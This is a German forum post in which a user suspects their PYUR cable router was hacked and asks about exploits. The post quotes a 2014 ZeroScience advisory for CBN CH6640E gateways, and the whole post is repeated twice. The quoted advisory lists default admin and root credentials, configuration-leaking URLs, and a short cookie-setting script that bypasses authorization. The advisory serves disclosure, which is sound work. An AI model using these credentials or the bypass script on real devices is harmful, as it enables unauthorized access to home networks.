WLAN-Kabelbox CH8978E Admin Login funktioniert nicht mehr.
Verfasst: Sa 15. Mär 2025, 16:37
Liebes Forum,
meine WLAN-Kabelbox CH8978E scheint gehacked.
Zuerst verschwand eines meiner W-Lan Netze, dann versuchte ich auf die admin-oberflache zu kommen- nur mein Passwort wurde nicht mehr angenommen.
Ok: Factory Reset!
Der Default Netzwerkname erschien, das default WPA2 Passwort funktionierte - ABER:
Das default admin Passwort: "Computer sagt: Nein."
Gibt es einen Exploit für die Compai Broadband Networks Hardware?
Was tut PYUR in diesem Fall?
Ich habe mich dann von wenig Kompetent wirkenden Call-CenterLadies zu einem Fritz!Box-Upgrade mit TV-Deal überredenlassen wobei ich dann direkt eine Teilkündigung aussprechen muss damit ich für 5 euro weniger im Monat eine neue HW bekomme...
ABER: Kennt jemand hier das Problem? Der Expolit ist Bekannt:
https://www.exploit-db.com/exploits/35075
CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Vendor: Compal Broadband Networks (CBN), Inc.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
Desc: The CBN modem gateway suffers from multiple vulnerabilities including
authorization bypass information disclosure, stored XSS, CSRF and denial of
service.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabil ... 4-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
meine WLAN-Kabelbox CH8978E scheint gehacked.
Zuerst verschwand eines meiner W-Lan Netze, dann versuchte ich auf die admin-oberflache zu kommen- nur mein Passwort wurde nicht mehr angenommen.
Ok: Factory Reset!
Der Default Netzwerkname erschien, das default WPA2 Passwort funktionierte - ABER:
Das default admin Passwort: "Computer sagt: Nein."
Gibt es einen Exploit für die Compai Broadband Networks Hardware?
Was tut PYUR in diesem Fall?
Ich habe mich dann von wenig Kompetent wirkenden Call-CenterLadies zu einem Fritz!Box-Upgrade mit TV-Deal überredenlassen wobei ich dann direkt eine Teilkündigung aussprechen muss damit ich für 5 euro weniger im Monat eine neue HW bekomme...
ABER: Kennt jemand hier das Problem? Der Expolit ist Bekannt:
https://www.exploit-db.com/exploits/35075
CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Vendor: Compal Broadband Networks (CBN), Inc.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
Desc: The CBN modem gateway suffers from multiple vulnerabilities including
authorization bypass information disclosure, stored XSS, CSRF and denial of
service.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabil ... 4-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--